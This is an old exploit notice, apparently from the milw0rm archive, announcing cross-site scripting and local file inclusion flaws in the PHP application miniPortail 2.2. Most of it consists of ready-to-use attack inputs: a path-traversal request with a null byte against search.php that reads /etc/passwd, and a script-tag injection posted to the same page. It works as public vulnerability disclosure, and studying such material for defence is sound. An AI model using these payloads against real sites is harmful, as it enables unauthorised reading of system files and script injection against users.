miniPortail 2.2 - Cross-Site Scripting / Local File Inclusion


Author:

StAkeR

Type:

webapps

Platform:

PHP

Published:

2008-10-23

/*

   miniPortail <= 2.2 (XSS/LFI) Remote Vulnerabilities
   -------------------------------------------------------
   By StAkeR - StAkeR[at]hotmail[dot]it
   http://www.easy-script.com/scripts-dl/miniportail.zip
   -------------------------------------------------------
   
   -1 Local File Inclusion
   -  search.php?lng=../../../../../../etc/passwd%00
   
   -2 Cross Site Scritping (POST)
   -  search.php (<script>[javascript]</script>)
   
*/

# milw0rm.com [2008-10-23]